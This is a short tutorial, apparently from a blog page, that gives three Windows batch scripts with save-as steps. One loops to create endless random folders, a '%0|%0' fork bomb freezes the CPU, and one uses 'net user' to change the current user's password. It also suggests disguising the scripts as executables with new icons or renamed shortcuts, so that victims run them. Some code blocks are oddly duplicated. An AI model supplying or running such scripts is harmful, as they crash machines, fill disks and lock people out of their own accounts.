1. Make an Infinity of Folders :
1) Open Notepad
2) Paste the following code:
@echo off
:ztuts
md %random%
goto ztuts
:ztuts
md %random%
goto ztuts
3) Now click File > Save as... and save it as "folders.bat"
4) You can customize it, by Converting the Bat file to Exe file and adding an Icon.
2. Freezes the CPU
1) Open up Notepad
2) Paste the following code:
%0|%0
3) Save it as : "CPU.bat"
4) You can also customize this Bat file by creating a shortcut of it, changing its icon then rename it.
3. Change Computer Password
1) Launch Notepad
2) Paste the following code:
@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::
Note: Change "Razor" to anything you want, that will be the pass.
3) Save it as "anything.bat"
4) Done!
0 comments